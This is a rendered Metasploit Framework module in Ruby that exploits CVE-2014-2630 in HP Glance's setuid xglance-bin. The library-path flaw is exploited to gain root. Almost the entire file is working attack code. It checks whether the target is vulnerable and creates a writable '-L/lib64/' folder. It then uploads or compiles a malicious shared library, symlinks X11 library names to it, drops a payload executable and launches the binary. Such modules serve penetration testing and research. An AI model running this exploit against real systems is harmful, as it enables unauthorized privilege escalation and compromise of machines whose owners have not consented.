Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/local/hp_xglance_priv_esc.rb
30182 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = GreatRanking

8


9
  include Msf::Post::Linux::Priv

10
  include Msf::Post::Linux::System

11
  include Msf::Post::Linux::Compile

12
  include Msf::Post::File

13
  include Msf::Exploit::EXE

14
  include Msf::Exploit::FileDropper

15
  prepend Msf::Exploit::Remote::AutoCheck

16


17
  def initialize(info = {})

18
    super(

19
      update_info(

20
        info,

21
        'Name' => 'HP Performance Monitoring xglance Priv Esc',

22
        'Description' => %q{

23
          This exploit takes advantage of xglance-bin, part of

24
          HP's Glance (or Performance Monitoring) version 11 'and subsequent'

25
          , which was compiled with an insecure RPATH option.  The RPATH includes

26
          a relative path to -L/lib64/ which can be controlled by a user.

27
          Creating libraries in this location will result in an

28
          escalation of privileges to root.

29
        },

30
        'License' => MSF_LICENSE,

31
        'Author' => [

32
          'h00die', # msf module

33
          'Tim Brown', # original finding

34
          'Robert Jaroszuk', # exploit

35
          'Marco Ortisi', # exploit

36
        ],

37
        'Platform' => [ 'linux' ],

38
        'SessionTypes' => [ 'shell', 'meterpreter' ],

39
        'Targets' => [

40
          [ 'Automatic', {} ],

41
          [ 'Linux x86', { 'Arch' => ARCH_X86 } ],

42
          [ 'Linux x64', { 'Arch' => ARCH_X64 } ]

43
        ],

44
        'Privileged' => true,

45
        'References' => [

46
          [ 'EDB', '48000' ],

47
          [ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/55' ], # permissions, original finding

48
          [ 'URL', 'https://www.redtimmy.com/linux-hacking/perf-exploiter/' ], # exploit

49
          [ 'URL', 'https://github.com/redtimmy/perf-exploiter' ],

50
          [ 'PACKETSTORM', '156206' ],

51
          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2630/' ],

52
          [ 'CVE', '2014-2630' ]

53
        ],

54
        'DisclosureDate' => '2014-11-19',

55
        'DefaultTarget' => 0,

56
        'Notes' => {

57
          'Stability' => [CRASH_SAFE],

58
          'Reliability' => [REPEATABLE_SESSION],

59
          'SideEffects' => [ARTIFACTS_ON_DISK]

60
        }

61
      )

62
    )

63
    register_options [

64
      OptString.new('GLANCE_PATH', [ true, 'Path to xglance-bin', '/opt/perf/bin/xglance-bin' ])

65
    ]

66
    register_advanced_options [

67
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])

68
    ]

69
  end

70


71
  # Simplify pulling the writable directory variable

72
  def base_dir

73
    datastore['WritableDir'].to_s

74
  end

75


76
  def exploit_folder

77
    "#{base_dir}/-L/lib64/"

78
  end

79


80
  def glance_path

81
    datastore['GLANCE_PATH'].to_s

82
  end

83


84
  # Pull the exploit binary or file (.c typically) from our system

85
  def exploit_data(file)

86
    ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-2630', file)

87
  end

88


89
  def find_libs

90
    libs = cmd_exec "ldd #{glance_path} | grep libX"

91
    %r{(?<lib>libX.+\.so\.\d) => -L/lib64} =~ libs

92
    return nil if lib.nil?

93


94
    lib

95
  end

96


97
  def check

98
    return CheckCode::Safe("#{glance_path} file not found") unless file? glance_path

99
    return CheckCode::Safe("#{glance_path} is not setuid") unless setuid? glance_path

100


101
    lib = find_libs

102
    if lib.nil?

103
      vprint_error 'Patched xglance-bin, not linked to -L/lib64/'

104
      return CheckCode::Safe

105
    end

106
    vprint_good "xglance-bin found, and linked to vulnerable relative path -L/lib64/ through #{lib}"

107
    CheckCode::Appears

108
  end

109


110
  def exploit

111
    if !datastore['ForceExploit'] && is_root?

112
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')

113
    end

114


115
    unless writable? base_dir

116
      fail_with Failure::BadConfig, "#{base_dir} is not writable"

117
    end

118


119
    # delete exploit folder in case a previous attempt failed

120
    vprint_status("Deleting exploit folder: #{base_dir}/-L")

121
    rm_cmd = "rm -rf \"#{base_dir}/-L\""

122
    cmd_exec(rm_cmd)

123
    # make folder

124
    vprint_status("Creating exploit folder: #{exploit_folder}")

125
    cmd_exec "mkdir -p #{exploit_folder}"

126
    register_dir_for_cleanup "#{base_dir}/-L"

127


128
    # drop our .so on the system that calls our payload

129
    # we need gcc to compile instead of metasm since metasm

130
    # removes unused variables, which we need to keep xglance-bin

131
    # from breaking and not launching our exploit

132
    so_file = "#{exploit_folder}libXm.so.3"

133
    if live_compile?

134
      vprint_status 'Live compiling exploit on system...'

135
      payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"

136
      code = exploit_data('CVE-2014-2630.c')

137
      code.sub!(payload_path.to_s, payload_path) # inject our payload path

138
      upload_and_compile so_file, code, '-fPIC -shared -static-libgcc'

139
      rm_f "#{so_file}.c"

140
    else

141
      payload_path = '/tmp/.u4aLoiq'

142
      vprint_status 'Dropping pre-compiled exploit on system...'

143
      upload_and_chmodx so_file, exploit_data('libXm.so.3')

144
    end

145


146
    # Upload payload executable

147
    vprint_status 'uploading payload'

148
    upload_and_chmodx payload_path, generate_payload_exe

149


150
    # link so files to exploit vuln

151
    lib = find_libs

152
    # just to be safe, Xt and Xp were in the original exploit

153
    # our mock binary is also exploitsable through libXmu.so.6

154
    # unsure about the real binary

155
    cd exploit_folder

156
    ['libXp.so.6', 'libXt.so.6', 'libXmu.so.6', lib].each do |l|

157
      cmd_exec "ln -s libXm.so.3 #{l}"

158
    end

159


160
    # Launch exploit

161
    print_status 'Launching xglance-bin...'

162
    cd base_dir

163
    output = cmd_exec glance_path

164
    output.each_line { |line| vprint_status line.chomp }

165
    print_warning("Manual cleanup of #{exploit_folder} may be required")

166
  end

167
end

168


169